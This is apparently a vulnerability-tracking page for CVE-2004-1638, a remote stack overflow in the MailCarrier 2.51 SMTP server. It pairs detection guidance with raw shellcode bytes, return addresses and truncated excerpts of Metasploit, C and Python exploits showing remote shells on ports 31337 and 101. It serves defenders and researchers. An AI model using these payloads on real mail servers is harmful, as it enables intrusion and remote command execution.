CVE-2004-1638
published 2004-10-16CVE-2004-1638: Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
62.76%
99.1th percentile
Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0x0fa14c63
bytes↗
0x0fa14ccf
bytes↗
0x7c2ee21b
bytes↗
0x7d17dd13
bytes↗
\xD3\x39\xD3\x77
bytes↗
\xEB\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x81\x59\x47
- →Detect oversized EHLO/HELO commands on SMTP port 25 targeting MailCarrier 2.51; exploit payloads use buffers of ~5093–5106 bytes followed by a return address. ↗
- →Fingerprint vulnerable MailCarrier 2.51 SMTP banners containing the string 'ESMTP TABS Mail Server for Windows NT' to identify exposed targets. ↗
- →Alert on post-exploitation reverse shell connections to port 31337 originating from SMTP servers running MailCarrier. ↗
- →The exploit bad characters for payload encoding are null byte, LF, CR, and colon (\x00\x0a\x0d:); use these to tune SMTP content inspection signatures. ↗
- →The return address used in exploitation points into expsrv.dll (jmp esp gadget); monitor for abnormal execution flow involving expsrv.dll on Windows SMTP servers. ↗
- ·Return addresses are platform-specific; the Metasploit module targets Windows 2000 SP0 through XP SP2 (EN/FR/GR) only, using gadgets inside expsrv.dll. ↗
- ·The Metasploit payload space is limited to 300 bytes and requires LHOST to be set because the overflow length is calculated as 5106 minus the LHOST string length. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-1638 TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)
TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)
---
##
# $Id: mailcarrier_smtp_ehlo.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
'Description' => %q{
This module exploits the MailCarrier v2.51 suite SMTP service.
The stack is overwritten when sending an overly long EHLO command.
},
'Author' => [ 'Patrick Webster ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-1638' ],
[ 'OSVDB', '11174' ],
[ 'BID', '
Exploit-DB
TABS MailCarrier 2.51 - Remote Buffer Overflow
exploitdb·2004-11-16
CVE-2004-1638 TABS MailCarrier 2.51 - Remote Buffer Overflow
TABS MailCarrier 2.51 - Remote Buffer Overflow
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
exploitdb·2004-10-26
CVE-2004-1638 TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
Metasploit
TABS MailCarrier v2.51 SMTP EHLO Overflow
metasploit
TABS MailCarrier v2.51 SMTP EHLO Overflow
TABS MailCarrier v2.51 SMTP EHLO Overflow
This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=109880961630050&w=2http://secunia.com/advisories/12999http://www.securityfocus.com/bid/11535https://exchange.xforce.ibmcloud.com/vulnerabilities/17861http://marc.info/?l=bugtraq&m=109880961630050&w=2http://secunia.com/advisories/12999http://www.securityfocus.com/bid/11535https://exchange.xforce.ibmcloud.com/vulnerabilities/17861
2004-10-16
Published